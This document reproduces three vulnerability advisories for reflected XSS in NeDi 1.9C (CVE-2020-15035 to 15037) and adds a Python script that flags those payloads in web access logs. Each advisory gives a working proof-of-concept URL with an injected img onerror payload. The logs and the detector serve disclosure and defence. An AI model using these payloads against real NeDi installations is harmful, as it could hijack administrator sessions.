Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "st[]" parameter of the "Reports-Devices.php" page.
Steps To Reproduce:-
1. Log in to the application.
2. Go to the "https://ip/Reports-Devices.php" page.
3. Add the st[] parameter at the end of the URL.
Example:- https://ip/Reports-Devices.php?in[]=device&op[]=~&st[]="><img src=x onerror=alert(document.domain)>&lir=10
Reference: CVE-2020-15037

Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "dv" parameter of the "Topology-Linked.php" page.
Steps To Reproduce:-
1. Log in to the application.
2. Go to the "https://ip/Topology-Linked.php" page.
3. Add the dv parameter at the end of the URL.
Example:- https://ip/Topology-Linked.php?dv=<img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15036

Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "hde" parameter of the "Monitoring-Map.php" page.
Steps To Reproduce:-
1. Log in to the application.
2. Go to the "https://ip/Monitoring-Map.php" page.
3. Add the hde parameter at the end of the URL.
Example:- https://ip/Monitoring-Map.php?hde="><img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15035
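
A log check for the three page/parameter pairs listed above, as an added example that is not part of the original advisories. It assumes NeDi is served from the web root as in the example URLs and that the web server writes common/combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Page/parameter pairs named in the three advisories above.
WATCHED = {
    "/Reports-Devices.php": {"st[]"},
    "/Topology-Linked.php": {"dv"},
    "/Monitoring-Map.php": {"hde"},
}
# Markup breakout characters or an inline event-handler attribute in a value.
SUSPICIOUS = re.compile(r'[<>"]|\bon[a-z]+\s*=', re.IGNORECASE)
# Request field of a common/combined access-log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2020:10:00:00 +0000] "GET /Reports-Devices.php'
    '?in%5B%5D=device&op%5B%5D=~&st%5B%5D=%22%3E%3Cimg%20src%3Dx%20onerror'
    '%3Dalert(document.domain)%3E&lir=10 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jul/2020:10:01:00 +0000] "GET /Topology-Linked.php'
    '?dv=core-sw01 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jul/2020:10:02:00 +0000] "GET /Monitoring-Map.php'
    '?hde=%22%3E%3Cimg%20src%3Dx%3E HTTP/1.1" 200 4096',
]


def find_suspicious_requests(log_lines):
    """Return (line_number, path, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        watched_params = WATCHED.get(target.path, set())
        # parse_qsl percent-decodes names and values, so st%5B%5D becomes st[].
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name in watched_params and SUSPICIOUS.search(value):
                hits.append((number, target.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```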